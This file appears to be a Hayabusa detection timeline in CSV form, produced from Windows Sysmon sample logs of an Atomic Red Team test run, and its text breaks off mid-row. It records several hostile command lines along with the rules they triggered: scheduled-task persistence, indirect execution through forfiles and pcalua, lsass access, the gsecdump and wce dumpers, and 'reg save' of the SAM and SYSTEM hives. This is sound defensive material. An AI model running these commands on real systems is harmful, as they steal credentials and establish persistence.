+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: 
SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,rules/sigma/process_creation/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 
747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.608 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 
747F3D96-DA6A-5D31-0000-001074C23E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-DA6A-5D31-0000-00104BC83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | 
Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 747F3D96-DA6E-5D31-0000-001081F93E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 
747F3D96-DA70-5D31-0000-001007293F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-DA72-5D31-0000-0010044F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 
747F3D96-DA72-5D31-0000-001056513F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 747F3D96-DA73-5D31-0000-00106A8D3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 
747F3D96-DA73-5D31-0000-0010918F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 
747F3D96-DD8B-5D31-0000-001094584A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 
747F3D96-D4A4-5D31-0000-00104A560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 747F3D96-DD94-5D31-0000-0010F4864A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 
747F3D96-DD95-5D31-0000-0010B38E4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DD95-5D31-0000-001075964A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and 
Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-DD99-5D31-0000-001069A34A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 
